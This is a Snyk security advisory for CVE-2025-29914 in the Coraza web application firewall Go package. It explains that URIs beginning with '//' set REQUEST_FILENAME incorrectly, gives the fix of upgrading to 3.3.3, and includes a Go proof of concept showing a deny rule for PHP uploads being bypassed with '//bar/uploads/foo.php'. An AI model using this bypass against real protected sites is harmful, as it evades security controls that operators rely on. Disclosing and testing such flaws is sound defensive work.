Use of Incorrectly-Resolved Name or Reference Affecting github.com/corazawaf/coraza/v3/internal/corazawaf package, versions <3.3.3
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of Concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-GOLANG-GITHUBCOMCORAZAWAFCORAZAV3INTERNALCORAZAWAF-9510956
- published23 Mar 2025
- disclosed20 Mar 2025
- creditblotus
Introduced: 20 Mar 2025
NewCVE-2025-29914 (opens in a new tab)Common Vulnerabilities and Exposures (CVE) are common identifiers for publicly known security vulnerabilities
Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
Upgrade github.com/corazawaf/coraza/v3/internal/corazawaf to version 3.3.3 or higher.
Overview
Affected versions of this package are vulnerable to Use of Incorrectly-Resolved Name or Reference when parsing URIs in ProcessURI(). An attacker can bypass security rules by sending URIs that starting with //. which lead to an incorrect setting of the REQUEST_FILENAME.
PoC
package main
import (
"fmt"
"net/url"
"os"
"github.com/corazawaf/coraza/v3"
)
const testRule = `
SecDebugLogLevel 9
SecDebugLog /dev/stdout
SecRule REQUEST_FILENAME "@rx /bar/uploads/.*\.(h?ph(p|tm?l?|ar)|module|shtml)" "id:1,phase:1,deny"
`
func main() {
var testURL = "//bar/uploads/foo.php"
if os.Getenv("TEST_URL") != "" {
testURL = os.Getenv("TEST_URL")
}
fmt.Printf("Testing URL: %s\n", testURL)
config := coraza.NewWAFConfig().WithDirectives(testRule)
waf, err := coraza.NewWAF(config)
if err != nil {
panic(err)
}
tx := waf.NewTransaction()
tx.ProcessURI(testURL, "GET", "HTTP/1.1")
in := tx.ProcessRequestHeaders()
if in != nil {
fmt.Printf("%+v\n", in)
}
}